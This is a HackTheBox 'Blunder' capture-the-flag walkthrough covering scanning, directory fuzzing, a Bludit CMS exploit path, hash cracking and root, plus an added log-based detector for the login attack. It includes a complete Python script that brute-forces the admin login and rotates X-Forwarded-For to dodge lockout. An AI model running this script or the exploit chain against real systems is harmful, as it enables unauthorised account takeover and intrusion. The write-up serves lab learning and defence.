. . .
Introduction
At the time of writing this blog, the machine is still live, and this is the first time I am ever going to try doing this. Let’s hope I am able to root this.
. . .
Scanning & Enumeration
> ------------------------Nmap Results-----------------------------<
--------------------------------------------------------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 04:01 IST
Nmap scan report for 10.10.10.191
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 197.45 ms 10.10.14.1
2 197.48 ms 10.10.10.191
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.65 seconds
--------------------------------------------------------------------
From the results above, we see that only two ports showed up, FTP and HTTP, and FTP is closed.
HTTP Enumeration

Landing Page
The landing page looks like a dump of random facts.
But this part suggests that there is more than meets the eye.
Looking at the source code reveals a lot of directories that are exposed:
1. /bl-themes
2. /bl-kernel
3. /bl-content
Going through all of them, we find that ‘/bl-content/uploads/pages’ has a lot more entries than just the 3 posts that we see on the landing page.
All the folders inside /bl-content were empty, but we saw in the source that one file should have been there.
Let’s try gobuster to see if we find anything new.

gobuster results
We see ‘/admin’.

Admin Portal
This tells us that it is using BLUDIT CMS.
Let’s fuzz a little more.
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100

Wfuzz Results
We find ‘todo’, let’s look at the content there.

Contents of todo.txt
Now we have a username for the system, i.e. fergus.
. . .
Vulnerability Analysis

Searchsploit Results
We see that there are different exploits available in searchsploit.
The first Metasploit module looks promising: it lets us upload an image, and since we saw in the source code that a call was being made, we may be able to leverage that to get a shell.
Once we think in that direction, we realize that we need to be logged in first. This takes us back to enumeration.
cewl -w wordlists.txt -d 10 -m 1 http://blunder.htb/
This will generate a wordlist; now we can try to brute-force the login using the username and the wordlist.
#!/usr/bin/env python3
import re
import requests


def open_ressources(file_path):
    # Read the wordlist and strip the trailing newline from every entry
    return [item.replace("\n", "") for item in open(file_path).readlines()]


host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/media/Warehouse/Work/0xAadi/HackTheBox/blunder/wordlist.txt')

for password in wordlist:
    # Fresh session per attempt: the login form requires a matching CSRF token
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    headers = {
        # The X-Forwarded-For value changes on every attempt (the candidate password is reused as the value)
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    # A failed login re-renders the form; a successful one redirects to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
After we run this, we have the password.

Bruteforce Password
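From the defender's side, the script above leaves a distinctive trace: one TCP peer posting to /admin/login over and over while the X-Forwarded-For header changes on every request. The following Python is an added example, not part of the original write-up; it groups login attempts by the socket peer address rather than by the header, so a client rotating X-Forwarded-For still collapses into a single bucket. The log lines are constructed, and the log format (Apache combined with the X-Forwarded-For value appended as a final quoted field) is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: Apache "combined" format with the value of the
# X-Forwarded-For request header appended as a final quoted field. Failed
# logins re-render the form (200); the accepted one redirects (302).
SAMPLE_LOG = """\
10.10.14.5 - - [20/Aug/2020:04:10:01 +0000] "POST /admin/login HTTP/1.1" 200 2113 "-" "Mozilla/5.0" "guess01"
10.10.14.5 - - [20/Aug/2020:04:10:02 +0000] "POST /admin/login HTTP/1.1" 200 2113 "-" "Mozilla/5.0" "guess02"
10.10.14.5 - - [20/Aug/2020:04:10:03 +0000] "POST /admin/login HTTP/1.1" 200 2113 "-" "Mozilla/5.0" "guess03"
10.10.14.5 - - [20/Aug/2020:04:10:04 +0000] "POST /admin/login HTTP/1.1" 200 2113 "-" "Mozilla/5.0" "guess04"
10.10.14.5 - - [20/Aug/2020:04:10:05 +0000] "POST /admin/login HTTP/1.1" 302 - "-" "Mozilla/5.0" "guess05"
10.10.14.9 - - [20/Aug/2020:04:11:00 +0000] "GET /admin/login HTTP/1.1" 200 2113 "-" "Mozilla/5.0" "-"
10.10.14.9 - - [20/Aug/2020:04:11:05 +0000] "POST /admin/login HTTP/1.1" 302 - "-" "Mozilla/5.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$')


def find_login_bruteforce(log_text, window_s=60, min_attempts=4):
    """Flag TCP peers bursting POSTs at /admin/login inside one window. Grouping by
    socket peer, not X-Forwarded-For, keeps a header-rotating client in one bucket."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m['method'] != 'POST' or m['path'] != '/admin/login':
            continue
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        attempts[m['peer']].append((ts, m['xff'], m['status']))
    findings = []
    for peer, events in attempts.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            burst = [e for e in events[i:] if (e[0] - start).total_seconds() <= window_s]
            if len(burst) >= min_attempts:
                xffs = {xff for _, xff, _ in burst if xff != '-'}
                findings.append({
                    'peer': peer,
                    'attempts': len(burst),
                    'distinct_xff': len(xffs),
                    # many distinct header values inside one burst = lockout-evasion pattern
                    'header_rotation': len(xffs) >= min_attempts,
                    'login_succeeded': any(status == '302' for _, _, status in burst),
                })
                break  # one finding per peer is enough
    return findings
```

A login that succeeds at the end of such a burst is the case worth paging on, since it means the guessed credentials are now in use.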
. . .
Exploitation
Let’s jump to Metasploit; yes, I will use it here because this is not a part of the OSCP series.

Meterpreter Shell
Once we are in, we see that there is a user called hugo, but we have no idea how to get to that user. So I keep wandering around, and then I see that there is another bludit directory inside /var/www. Well, this is interesting!
I found users.php inside, and it has the hash of the password for user Hugo; let’s get cracking.
I tried rockyou.txt, but that obviously didn’t work. Let’s look it up online.
This is a great website.
Got my hash cracked and was able to login as hugo.

Shell with user "hugo"
. . .
Privesc
Once we have our initial shell, let’s privesc.
So I started wandering round and about, and I saw some photos in shaun’s picture directory. Now this is not exactly a privesc, but in one of the photos we see the contents of root.txt.
The user has run some poc.py, and the directory /usr/sbin/local has this `buf`.

Screenshot on shaun's directory
This is what we find. Well, naive me, I typed it all out. It didn’t work!

Shell with Root Privileges
Finally got root!
Thank you for reading, please provide your feedback and share with people who are in need. :)
. . .